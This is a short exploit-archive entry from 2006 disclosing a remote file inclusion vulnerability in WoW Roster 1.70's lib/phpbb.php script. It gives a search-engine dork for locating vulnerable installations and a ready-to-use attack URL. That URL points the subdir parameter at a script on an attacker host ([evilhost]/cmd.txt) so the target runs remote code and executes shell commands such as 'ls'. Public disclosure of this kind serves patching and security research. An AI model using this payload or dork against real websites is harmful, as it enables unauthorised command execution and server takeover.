WoW Roster 1.70 - '/lib/phpBB.php' Remote File Inclusion
Author: |peti
type: webapps
platform: php
port:
date_added: 2006-08-01
date_updated:
verified: 1
codes:
tags:
aliases:
screenshot_url:
application_url:
--------------------------------------------------------------------------------
Title : WoW Roster (/lib/phpbb.php) Remote File Include Vulnerability
--------------------------------------------------------------------------------
Affected software description :
Application : World of Warcraft (WoW) Roster
URL : http://www.wowroster.net/
--------------------------------------------------------------------------------
dork : "wow roster version 1.*"
Exploit :
--------------------------------------------------------------------------------
Usage:
http://[target]/[roster_path]/lib/phpbb.php?subdir=http://[evilhost]/cmd.txt?&cmd=ls
--------------------------------------------------------------------------------
greets:
XLR, rdy, wiggle, phreek, menx [...]
special greet: my old gf ;)
--------------------------------------------------------------------------------
Contact:
Nick: |peti on irc.quakenet.org/irc.efnet.net
--------------------------------- [ eof ] --------------------------------------
# milw0rm.com [2006-08-02]